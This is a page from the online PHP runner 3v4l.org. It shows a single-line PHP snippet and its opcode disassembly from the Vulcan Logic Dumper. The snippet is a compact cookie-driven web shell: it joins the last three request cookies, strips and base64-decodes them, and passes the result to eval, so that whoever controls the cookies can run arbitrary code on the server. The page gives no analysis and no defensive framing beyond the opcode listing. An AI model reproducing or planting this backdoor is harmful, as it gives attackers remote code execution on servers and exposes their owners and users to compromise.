3v4l.org

run code in 300+ PHP versions simultaneously
<?php eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/SmHnL
function name:  (null)
number of ops:  21
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    4     0  E >   INIT_FCALL                                               'base64_decode'
          1        INIT_FCALL                                               'preg_replace'
          2        SEND_VAL                                                 <array>
          3        SEND_VAL                                                 <array>
          4        INIT_FCALL                                               'join'
          5        INIT_FCALL                                               'array_slice'
          6        FETCH_R                      global              ~0      '_COOKIE'
          7        SEND_VAL                                                 ~0
          8        FETCH_R                      global              ~1      '_COOKIE'
          9        COUNT                                            ~2      ~1
         10        SUB                                              ~3      ~2, 3
         11        SEND_VAL                                                 ~3
         12        DO_ICALL                                         $4      
         13        SEND_VAR                                                 $4
         14        DO_ICALL                                         $5      
         15        SEND_VAR                                                 $5
         16        DO_ICALL                                         $6      
         17        SEND_VAR                                                 $6
         18        DO_ICALL                                         $7      
         19        INCLUDE_OR_EVAL                                          $7, EVAL
         20      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
177.82 ms | 1398 KiB | 22 Q